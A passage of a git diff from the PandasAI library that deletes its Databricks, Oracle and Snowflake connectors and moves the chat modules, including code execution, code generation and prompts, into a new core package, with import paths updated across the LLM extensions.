.../snowflake/pandasai_snowflake/snowflake.py | 123 ---
.../llms/bedrock/pandasai_bedrock/base.py | 2 +-
.../llms/bedrock/pandasai_bedrock/claude.py | 2 +-
.../llms/bedrock/tests/test_bedrock_claude.py | 2 +-
.../llms/google/pandasai_google/base.py | 2 +-
.../huggingface_text_gen.py | 2 +-
.../llms/ibm/pandasai_ibm/ibm_watsonx.py | 4 +-
.../langchain/pandasai_langchain/langchain.py | 2 +-
.../llms/local/pandasai_local/local_llm.py | 2 +-
.../llms/openai/pandasai_openai/base.py | 2 +-
pandasai/agent/base.py | 19 +-
pandasai/{chat => core}/cache.py | 0
.../{chat => core}/code_execution/__init__.py | 0
.../code_execution/code_executor.py | 2 +-
.../code_execution/environment.py | 0
.../safe_libs/base_restricted_module.py | 8 +-
.../safe_libs/restricted_base64.py | 0
.../safe_libs/restricted_datetime.py | 0
.../safe_libs/restricted_json.py | 0
.../safe_libs/restricted_matplotlib.py | 0
.../safe_libs/restricted_numpy.py | 0
.../safe_libs/restricted_pandas.py | 0
.../safe_libs/restricted_seaborn.py | 0
.../code_generation/__init__.py | 0
.../{chat => core}/code_generation/base.py | 2 +-
.../code_generation/code_cleaning.py | 6 +-
.../code_generation/code_security.py | 0
.../code_generation/code_validation.py | 0
pandasai/{chat => core}/prompts/__init__.py | 4 +-
pandasai/{chat => core}/prompts/base.py | 0
.../prompts/correct_error_prompt.py | 0
...ct_execute_sql_query_usage_error_prompt.py | 2 +-
.../correct_output_type_error_prompt.py | 0
.../prompts/file_based_prompt.py | 0
.../prompts/generate_python_code.py | 0
.../prompts/generate_python_code_with_sql.py | 2 +-
.../prompts/generate_system_message.py | 0
.../templates/correct_error_prompt.tmpl | 0
..._execute_sql_query_usage_error_prompt.tmpl | 0
.../correct_output_type_error_prompt.tmpl | 0
.../templates/generate_python_code.tmpl | 0
.../generate_python_code_with_sql.tmpl | 0
.../templates/generate_system_message.tmpl | 0
.../prompts/templates/shared/dataframe.tmpl | 0
.../shared/output_type_template.tmpl | 0
.../templates/shared/vectordb_docs.tmpl | 0
pandasai/{chat => core}/response/__init__.py | 0
pandasai/{chat => core}/response/base.py | 2 +
.../{chat => core}/response/response_types.py | 0
pandasai/{chat => core}/user_query.py | 6 +-
pandasai/llm/bamboo_llm.py | 2 +-
pandasai/llm/base.py | 4 +-
pandasai/llm/fake.py | 2 +-
pandasai/pipelines/chat/code_cleaning.py | 611 ------------
pandasai/pipelines/chat/code_execution.py | 316 ------
.../pipelines/chat/validate_pipeline_input.py | 29 -
pandasai/safe_libs/base_restricted_module.py | 27 -
pandasai/safe_libs/restricted_base64.py | 21 -
pandasai/safe_libs/restricted_datetime.py | 64 --
pandasai/safe_libs/restricted_json.py | 23 -
pandasai/safe_libs/restricted_matplotlib.py | 76 --
pandasai/safe_libs/restricted_numpy.py | 182 ----
pandasai/safe_libs/restricted_pandas.py | 110 ---
pandasai/safe_libs/restricted_seaborn.py | 74 --
pandasai/schemas/__init__.py | 1 -
tests/unit_tests/agent/test_agent.py | 416 +++++---
tests/unit_tests/agent/test_base_agent.py | 60 --
.../safe_libs/test_base_restricted_module.py | 146 +++
.../code_execution/test_code_execution.py | 129 +++
.../core/code_execution/test_environment.py | 87 ++
.../code_generation/test_code_cleaning.py | 179 ++++
.../code_generation/test_code_security.py | 94 ++
.../code_generation/test_code_validation.py | 72 ++
tests/unit_tests/core/prompts/test_prompts.py | 93 ++
tests/unit_tests/dataframe/test_dataframe.py | 18 +-
tests/unit_tests/dataframe/test_loader.py | 17 +-
.../helpers/test_optional_dependency.py | 14 +-
tests/unit_tests/helpers/test_responses.py | 127 ++-
tests/unit_tests/llms/test_bamboo_llm.py | 9 +-
.../smart_datalake/test_code_cleaning.py | 917 ------------------
.../smart_datalake/test_code_execution.py | 326 -------
.../smart_datalake/test_code_generator.py | 112 ---
.../test_error_prompt_generation.py | 111 ---
.../smart_datalake/test_prompt_generation.py | 127 ---
.../smart_datalake/test_result_parsing.py | 133 ---
.../smart_datalake/test_result_validation.py | 135 ---
.../test_validate_pipeline_input.py | 239 -----
tests/unit_tests/pipelines/test_pipeline.py | 163 ----
.../prompts/test_correct_error_prompt.py | 6 +-
.../test_generate_python_code_prompt.py | 25 +-
tests/unit_tests/prompts/test_sql_prompt.py | 20 +-
.../responses/test_response_serializer.py | 34 -
tests/unit_tests/schemas/__init__.py | 0
tests/unit_tests/schemas/test_df_config.py | 18 -
tests/unit_tests/test_pandasai_init.py | 101 +-
97 files changed, 1345 insertions(+), 4577 deletions(-)
delete mode 100644 extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
delete mode 100644 extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
delete mode 100644 extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
rename pandasai/{chat => core}/cache.py (100%)
rename pandasai/{chat => core}/code_execution/__init__.py (100%)
rename pandasai/{chat => core}/code_execution/code_executor.py (98%)
rename pandasai/{chat => core}/code_execution/environment.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/base_restricted_module.py (74%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_base64.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_datetime.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_json.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_matplotlib.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_numpy.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_pandas.py (100%)
rename pandasai/{chat => core}/code_execution/safe_libs/restricted_seaborn.py (100%)
rename pandasai/{chat => core}/code_generation/__init__.py (100%)
rename pandasai/{chat => core}/code_generation/base.py (97%)
rename pandasai/{chat => core}/code_generation/code_cleaning.py (98%)
rename pandasai/{chat => core}/code_generation/code_security.py (100%)
rename pandasai/{chat => core}/code_generation/code_validation.py (100%)
rename pandasai/{chat => core}/prompts/__init__.py (94%)
rename pandasai/{chat => core}/prompts/base.py (100%)
rename pandasai/{chat => core}/prompts/correct_error_prompt.py (100%)
rename pandasai/{chat => core}/prompts/correct_execute_sql_query_usage_error_prompt.py (94%)
rename pandasai/{chat => core}/prompts/correct_output_type_error_prompt.py (100%)
rename pandasai/{chat => core}/prompts/file_based_prompt.py (100%)
rename pandasai/{chat => core}/prompts/generate_python_code.py (100%)
rename pandasai/{chat => core}/prompts/generate_python_code_with_sql.py (76%)
rename pandasai/{chat => core}/prompts/generate_system_message.py (100%)
rename pandasai/{chat => core}/prompts/templates/correct_error_prompt.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/correct_output_type_error_prompt.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_python_code.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_python_code_with_sql.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_system_message.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/dataframe.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/output_type_template.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/vectordb_docs.tmpl (100%)
rename pandasai/{chat => core}/response/__init__.py (100%)
rename pandasai/{chat => core}/response/base.py (96%)
rename pandasai/{chat => core}/response/response_types.py (100%)
rename pandasai/{chat => core}/user_query.py (85%)
delete mode 100644 pandasai/pipelines/chat/code_cleaning.py
delete mode 100644 pandasai/pipelines/chat/code_execution.py
delete mode 100644 pandasai/pipelines/chat/validate_pipeline_input.py
delete mode 100644 pandasai/safe_libs/base_restricted_module.py
delete mode 100644 pandasai/safe_libs/restricted_base64.py
delete mode 100644 pandasai/safe_libs/restricted_datetime.py
delete mode 100644 pandasai/safe_libs/restricted_json.py
delete mode 100644 pandasai/safe_libs/restricted_matplotlib.py
delete mode 100644 pandasai/safe_libs/restricted_numpy.py
delete mode 100644 pandasai/safe_libs/restricted_pandas.py
delete mode 100644 pandasai/safe_libs/restricted_seaborn.py
delete mode 100644 pandasai/schemas/__init__.py
delete mode 100644 tests/unit_tests/agent/test_base_agent.py
create mode 100644 tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
create mode 100644 tests/unit_tests/core/code_execution/test_code_execution.py
create mode 100644 tests/unit_tests/core/code_execution/test_environment.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_cleaning.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_security.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_validation.py
create mode 100644 tests/unit_tests/core/prompts/test_prompts.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
delete mode 100644 tests/unit_tests/pipelines/test_pipeline.py
delete mode 100644 tests/unit_tests/responses/test_response_serializer.py
delete mode 100644 tests/unit_tests/schemas/__init__.py
delete mode 100644 tests/unit_tests/schemas/test_df_config.py
diff --git a/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py b/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
deleted file mode 100644
index adb151e61..000000000
--- a/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
+++ /dev/null
@@ -1,194 +0,0 @@
-"""
-Databricks Connector to connects you to your Databricks SQL Warhouse on
-Azure, AWS and GCP
-"""
-
-from typing import Union, Optional, List, Dict, Any
-import pandas as pd
-from databricks import sql
-
-from pandasai.connectors.base import BaseConnectorConfig
-from pandasai_sql.sql import SQLBaseConnectorConfig, SQLConnector
-
-
-class DatabricksConnectorConfig(SQLBaseConnectorConfig):
- """
- Connector configuration for DataBricks.
- """
-
- host: str
- token: str
- http_path: str
-
-
-class DatabricksConnector(SQLConnector):
- """
- Databricks connectors are used to connect to Databricks Data Cloud.
- """
-
- def __init__(
- self,
- config: Union[DatabricksConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Databricks connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Databricks connector.
- """
- config["dialect"] = "databricks"
- if isinstance(config, dict):
- env_vars = {
- "token": "DATABRICKS_TOKEN",
- "database": "DATABRICKS_DATABASE",
- "host": "DATABRICKS_HOST",
- "http_path": "DATABRICKS_HTTP_PATH",
- }
- config = self._populate_config_from_env(config, env_vars)
-
- super().__init__(config, **kwargs)
-
- def _load_connector_config(self, config: Union[BaseConnectorConfig, dict]):
- return DatabricksConnectorConfig(**config)
-
- def _init_connection(self, config: DatabricksConnectorConfig):
- """
- Initialize Database Connection
-
- Args:
- config (DatabricksConnectorConfig): Configurations to load database
- """
- self._connection = sql.connect(
- server_hostname=config.host,
- http_path=config.http_path,
- access_token=config.token,
- )
- self._cursor = self._connection.cursor()
-
- def _build_query(
- self,
- limit: Optional[int] = None,
- order: Optional[str] = None,
- where: Optional[List[List[str]]] = None,
- ) -> str:
- """
- Build a SQL query string from the given parameters.
-
- Args:
- limit (Optional[int]): Maximum number of rows to return
- order (Optional[str]): Column to order by
- where (Optional[List[List[str]]]): List of where conditions. If not provided,
- uses conditions from config.
-
- Returns:
- str: The SQL query string
- """
- query = f"SELECT * FROM {self.config.database}.{self.config.table}"
-
- # Add WHERE clause
- where_conditions = (
- where if where is not None else getattr(self.config, "where", None)
- )
- if where_conditions:
- conditions = []
- for condition in where_conditions:
- if len(condition) == 3:
- col, op, val = condition
- if isinstance(val, str):
- val = f"'{val}'"
- conditions.append(f"{col} {op} {val}")
- if conditions:
- query += " WHERE " + " AND ".join(conditions)
-
- # Add ORDER BY clause
- if order:
- query += f" ORDER BY {order} ASC"
-
- # Add LIMIT clause
- if limit:
- query += f" LIMIT {limit}"
-
- return query
-
- def _execute_query(
- self, query: str, params: Optional[Dict[str, Any]] = None
- ) -> pd.DataFrame:
- """
- Execute a query and return the results as a pandas DataFrame
-
- Args:
- query (str): The query to execute
- params (Optional[Dict[str, Any]]): Query parameters
-
- Returns:
- pd.DataFrame: Query results as a DataFrame
- """
- try:
- if params:
- # Replace parameters in query string
- for key, value in params.items():
- if isinstance(value, str):
- value = f"'{value}'"
- query = query.replace(f":{key}", str(value))
-
- self._cursor.execute(query)
- result = self._cursor.fetchall()
-
- if not result:
- return pd.DataFrame()
-
- # Get column names from cursor description
- columns = [desc[0] for desc in self._cursor.description]
-
- # Convert result to DataFrame
- return pd.DataFrame(result, columns=columns)
- except Exception as e:
- self._cursor = self._connection.cursor() # Reset cursor on error
- raise e
-
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Get the first n rows of the table
-
- Args:
- n (int, optional): Number of rows to return. Defaults to 5.
-
- Returns:
- pd.DataFrame: First n rows of the table
- """
- query = self._build_query(limit=n)
- return self._execute_query(query)
-
- def __repr__(self):
- """
- Return the string representation of the Databricks connector.
-
- Returns:
- str: The string representation of the Databricks connector.
- """
- return (
- f"<{self.__class__.__name__} dialect={self.config.dialect} "
- f"host={self.config.host} "
- f"database={self.config.database} http_path={self.config.http_path}"
- )
-
- def equals(self, other):
- if isinstance(other, self.__class__):
- return (
- self.config.dialect,
- self.config.host,
- self.config.http_path,
- ) == (
- other.config.dialect,
- other.config.host,
- other.config.http_path,
- )
- return False
-
- def close(self):
- """Close the database connection"""
- if hasattr(self, "_cursor") and self._cursor:
- self._cursor.close()
- if hasattr(self, "_connection") and self._connection:
- self._connection.close()
diff --git a/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py b/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
deleted file mode 100644
index b0957101a..000000000
--- a/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
+++ /dev/null
@@ -1,62 +0,0 @@
-from functools import cache
-import pandas as pd
-from typing import Union
-from pandasai_sql import SQLConnector, SQLConnectorConfig
-
-
-class OracleConnector(SQLConnector):
- """
- Oracle connectors are used to connect to Oracle databases.
- """
-
- def __init__(
- self,
- config: Union[SQLConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Oracle connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Oracle connector.
- """
- config["dialect"] = "oracle"
- config["driver"] = "cx_oracle"
-
- if isinstance(config, dict):
- oracle_env_vars = {
- "host": "ORACLE_HOST",
- "port": "ORACLE_PORT",
- "database": "ORACLE_DATABASE",
- "username": "ORACLE_USERNAME",
- "password": "ORACLE_PASSWORD",
- }
- config = self._populate_config_from_env(config, oracle_env_vars)
-
- super().__init__(config, **kwargs)
-
- @cache
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
- This information is passed to the LLM to provide the schema of the data source.
-
- Returns:
- DataFrame: The head of the data source.
- """
-
- if self.logger:
- self.logger.log(
- f"Getting head of {self.config.table} "
- f"using dialect {self.config.dialect}"
- )
-
- # Run a SQL query to get all the columns names and 5 random rows
- query = self._build_query(limit=n, order="dbms_random.value")
-
- # Return the head of the data source
- return pd.read_sql(query, self._connection)
-
- @property
- def cs_table_name(self):
- return f'"{self.config.table}"'
diff --git a/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py b/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
deleted file mode 100644
index e45445d9e..000000000
--- a/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
+++ /dev/null
@@ -1,123 +0,0 @@
-from functools import cache
-from typing import Union
-
-from sqlalchemy import create_engine
-
-import pandas as pd
-
-from pandasai.connectors.base import BaseConnectorConfig
-from pandasai_sql.sql import SQLBaseConnectorConfig, SQLConnector
-
-
-class SnowflakeConnectorConfig(SQLBaseConnectorConfig):
- """
- Connector configuration for Snowflake.
- """
-
- account: str
- database: str
- username: str
- password: str
- dbSchema: str
- warehouse: str
-
-
-class SnowflakeConnector(SQLConnector):
- """
- Snowflake connectors are used to connect to Snowflake Data Cloud.
- """
-
- def __init__(
- self,
- config: Union[SnowflakeConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Snowflake connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Snowflake connector.
- """
- config["dialect"] = "snowflake"
-
- if isinstance(config, dict):
- snowflake_env_vars = {
- "account": "SNOWFLAKE_HOST",
- "database": "SNOWFLAKE_DATABASE",
- "warehouse": "SNOWFLAKE_WAREHOUSE",
- "dbSchema": "SNOWFLAKE_SCHEMA",
- "username": "SNOWFLAKE_USERNAME",
- "password": "SNOWFLAKE_PASSWORD",
- }
- config = self._populate_config_from_env(config, snowflake_env_vars)
-
- super().__init__(config, **kwargs)
-
- def _load_connector_config(self, config: Union[BaseConnectorConfig, dict]):
- return SnowflakeConnectorConfig(**config)
-
- def _init_connection(self, config: SnowflakeConnectorConfig):
- """
- Initialize Database Connection
-
- Args:
- config (SQLConnectorConfig): Configurations to load database
-
- """
- self._engine = create_engine(
- f"{config.dialect}://{config.username}:{config.password}@{config.account}/?warehouse={config.warehouse}&database={config.database}&schema={config.dbSchema}"
- )
-
- self._connection = self._engine.connect()
-
- @cache
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
- This information is passed to the LLM to provide the schema of the data source.
-
- Returns:
- DataFrame: The head of the data source.
- """
-
- if self.logger:
- self.logger.log(
- f"Getting head of {self.config.table} "
- f"using dialect {self.config.dialect}"
- )
-
- # Run a SQL query to get all the columns names and 5 random rows
- query = self._build_query(limit=n, order="RANDOM()")
-
- # Return the head of the data source
- return pd.read_sql(query, self._connection)
-
- def __repr__(self):
- """
- Return the string representation of the Snowflake connector.
-
- Returns:
- str: The string representation of the Snowflake connector.
- """
- return (
- f"<{self.__class__.__name__} dialect={self.config.dialect} "
- f"Account={self.config.account} "
- f"warehouse={self.config.warehouse} "
- f"database={self.config.database} schema={str(self.config.dbSchema)} "
- f"table={self.config.table}>"
- )
-
- def equals(self, other):
- if isinstance(other, self.__class__):
- return (
- self.config.dialect,
- self.config.dbSchema,
- self.config.warehouse,
- self.config.account,
- ) == (
- other.config.dialect,
- other.config.dbSchema,
- other.config.warehouse,
- other.config.account,
- )
- return False
diff --git a/extensions/llms/bedrock/pandasai_bedrock/base.py b/extensions/llms/bedrock/pandasai_bedrock/base.py
index 606248747..a4ab2c481 100644
--- a/extensions/llms/bedrock/pandasai_bedrock/base.py
+++ b/extensions/llms/bedrock/pandasai_bedrock/base.py
@@ -3,7 +3,7 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.exceptions import (
diff --git a/extensions/llms/bedrock/pandasai_bedrock/claude.py b/extensions/llms/bedrock/pandasai_bedrock/claude.py
index cc15ee8d4..f48e15510 100644
--- a/extensions/llms/bedrock/pandasai_bedrock/claude.py
+++ b/extensions/llms/bedrock/pandasai_bedrock/claude.py
@@ -3,7 +3,7 @@
import json
from typing import TYPE_CHECKING, Any, Dict, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from pandasai.helpers import load_dotenv
from pandasai.llm.base import LLM
diff --git a/extensions/llms/bedrock/tests/test_bedrock_claude.py b/extensions/llms/bedrock/tests/test_bedrock_claude.py
index 614e5153e..2c022bcaf 100644
--- a/extensions/llms/bedrock/tests/test_bedrock_claude.py
+++ b/extensions/llms/bedrock/tests/test_bedrock_claude.py
@@ -6,7 +6,7 @@
import pytest
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from extensions.llms.bedrock.pandasai_bedrock.claude import BedrockClaude
diff --git a/extensions/llms/google/pandasai_google/base.py b/extensions/llms/google/pandasai_google/base.py
index 606248747..a4ab2c481 100644
--- a/extensions/llms/google/pandasai_google/base.py
+++ b/extensions/llms/google/pandasai_google/base.py
@@ -3,7 +3,7 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.exceptions import (
diff --git a/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py b/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
index a6dd3fbaf..2717d5391 100644
--- a/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
+++ b/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
@@ -3,7 +3,7 @@
from typing import TYPE_CHECKING, Any, Dict, List, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers import load_dotenv
from pandasai.llm.base import LLM
diff --git a/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py b/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
index be6858dc2..dcbd5cc3c 100644
--- a/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
+++ b/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
@@ -3,8 +3,8 @@
import os
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.code_execution.environment import import_dependency
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.code_execution.environment import import_dependency
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError
from pandasai.helpers import load_dotenv
diff --git a/extensions/llms/langchain/pandasai_langchain/langchain.py b/extensions/llms/langchain/pandasai_langchain/langchain.py
index 067c77131..91e361a47 100644
--- a/extensions/llms/langchain/pandasai_langchain/langchain.py
+++ b/extensions/llms/langchain/pandasai_langchain/langchain.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
try:
from langchain_core.language_models import BaseLanguageModel
diff --git a/extensions/llms/local/pandasai_local/local_llm.py b/extensions/llms/local/pandasai_local/local_llm.py
index d8761159e..256a65e38 100644
--- a/extensions/llms/local/pandasai_local/local_llm.py
+++ b/extensions/llms/local/pandasai_local/local_llm.py
@@ -4,7 +4,7 @@
from openai import OpenAI
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.llm.base import LLM
diff --git a/extensions/llms/openai/pandasai_openai/base.py b/extensions/llms/openai/pandasai_openai/base.py
index 75afc74a9..4ff4d1a79 100644
--- a/extensions/llms/openai/pandasai_openai/base.py
+++ b/extensions/llms/openai/pandasai_openai/base.py
@@ -2,7 +2,7 @@
from typing import TYPE_CHECKING, Any, Dict, Mapping, Optional, Tuple, Union
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.llm.base import LLM
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index 5f1a7f12b..f7b9c7b56 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -2,23 +2,23 @@
import uuid
from typing import Any, List, Optional, Tuple, Union
-from pandasai.chat.cache import Cache
-from pandasai.chat.code_execution.code_executor import CodeExecutor
-from pandasai.chat.code_generation.base import CodeGenerator
-from pandasai.chat.prompts import (
+from pandasai.core.cache import Cache
+from pandasai.core.code_execution.code_executor import CodeExecutor
+from pandasai.core.code_generation.base import CodeGenerator
+from pandasai.core.prompts import (
get_chat_prompt,
get_chat_prompt_for_sql,
get_correct_error_prompt,
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
-from pandasai.chat.response.base import ResponseParser
-from pandasai.chat.user_query import UserQuery
+from pandasai.core.response.base import ResponseParser
+from pandasai.core.user_query import UserQuery
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
from .state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.llm.bamboo_llm import BambooLLM
from pandasai.vectorstores.vectorstore import VectorStore
@@ -166,6 +166,7 @@ def generate_code(
if self._state.config.direct_sql
else get_chat_prompt(self._state)
)
+
code, additional_dependencies = self._code_generator.generate_code(prompt)
self._state.last_prompt_used = prompt
return code, additional_dependencies
@@ -297,7 +298,9 @@ def _validate_input(self):
def _process_query(self, query: str, output_type: Optional[str] = None):
"""Process a user query and return the result."""
- query = UserQuery(query)
+ query = UserQuery(
+ query, secure=self._state.config.security in ["standard", "advanced"]
+ )
self._state.logger.log(f"Question: {query}")
self._state.logger.log(
f"Running PandasAI with {self._state.config.llm.type} LLM..."
diff --git a/pandasai/chat/cache.py b/pandasai/core/cache.py
similarity index 100%
rename from pandasai/chat/cache.py
rename to pandasai/core/cache.py
diff --git a/pandasai/chat/code_execution/__init__.py b/pandasai/core/code_execution/__init__.py
similarity index 100%
rename from pandasai/chat/code_execution/__init__.py
rename to pandasai/core/code_execution/__init__.py
diff --git a/pandasai/chat/code_execution/code_executor.py b/pandasai/core/code_execution/code_executor.py
similarity index 98%
rename from pandasai/chat/code_execution/code_executor.py
rename to pandasai/core/code_execution/code_executor.py
index 8b188be85..91aa13816 100644
--- a/pandasai/chat/code_execution/code_executor.py
+++ b/pandasai/core/code_execution/code_executor.py
@@ -1,5 +1,5 @@
import ast
-from pandasai.chat.code_execution.environment import get_environment
+from pandasai.core.code_execution.environment import get_environment
from pandasai.config import Config
from pandasai.exceptions import NoResultFoundError
diff --git a/pandasai/chat/code_execution/environment.py b/pandasai/core/code_execution/environment.py
similarity index 100%
rename from pandasai/chat/code_execution/environment.py
rename to pandasai/core/code_execution/environment.py
diff --git a/pandasai/chat/code_execution/safe_libs/base_restricted_module.py b/pandasai/core/code_execution/safe_libs/base_restricted_module.py
similarity index 74%
rename from pandasai/chat/code_execution/safe_libs/base_restricted_module.py
rename to pandasai/core/code_execution/safe_libs/base_restricted_module.py
index ce3bf21a5..e59d9c99b 100644
--- a/pandasai/chat/code_execution/safe_libs/base_restricted_module.py
+++ b/pandasai/core/code_execution/safe_libs/base_restricted_module.py
@@ -15,10 +15,14 @@ def wrapper(*args, **kwargs):
return wrapper
def _wrap_class(self, cls):
- class WrappedClass(cls):
+ class WrappedClass(cls, BaseRestrictedModule):
def __getattribute__(self, name):
+ # Avoid wrapping specific attributes like _wrap_function
+ if name in {"_wrap_function", "__class__"}:
+ return super().__getattribute__(name)
+
attr = super().__getattribute__(name)
- return self._wrap_function(self, attr) if callable(attr) else attr
+ return self._wrap_function(attr) if callable(attr) else attr
return WrappedClass
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_base64.py b/pandasai/core/code_execution/safe_libs/restricted_base64.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_base64.py
rename to pandasai/core/code_execution/safe_libs/restricted_base64.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_datetime.py b/pandasai/core/code_execution/safe_libs/restricted_datetime.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_datetime.py
rename to pandasai/core/code_execution/safe_libs/restricted_datetime.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_json.py b/pandasai/core/code_execution/safe_libs/restricted_json.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_json.py
rename to pandasai/core/code_execution/safe_libs/restricted_json.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_matplotlib.py b/pandasai/core/code_execution/safe_libs/restricted_matplotlib.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_matplotlib.py
rename to pandasai/core/code_execution/safe_libs/restricted_matplotlib.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_numpy.py b/pandasai/core/code_execution/safe_libs/restricted_numpy.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_numpy.py
rename to pandasai/core/code_execution/safe_libs/restricted_numpy.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_pandas.py b/pandasai/core/code_execution/safe_libs/restricted_pandas.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_pandas.py
rename to pandasai/core/code_execution/safe_libs/restricted_pandas.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_seaborn.py b/pandasai/core/code_execution/safe_libs/restricted_seaborn.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_seaborn.py
rename to pandasai/core/code_execution/safe_libs/restricted_seaborn.py
diff --git a/pandasai/chat/code_generation/__init__.py b/pandasai/core/code_generation/__init__.py
similarity index 100%
rename from pandasai/chat/code_generation/__init__.py
rename to pandasai/core/code_generation/__init__.py
diff --git a/pandasai/chat/code_generation/base.py b/pandasai/core/code_generation/base.py
similarity index 97%
rename from pandasai/chat/code_generation/base.py
rename to pandasai/core/code_generation/base.py
index 17c184749..498acec5a 100644
--- a/pandasai/chat/code_generation/base.py
+++ b/pandasai/core/code_generation/base.py
@@ -1,7 +1,7 @@
import traceback
from pandasai.agent.state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/chat/code_generation/code_cleaning.py b/pandasai/core/code_generation/code_cleaning.py
similarity index 98%
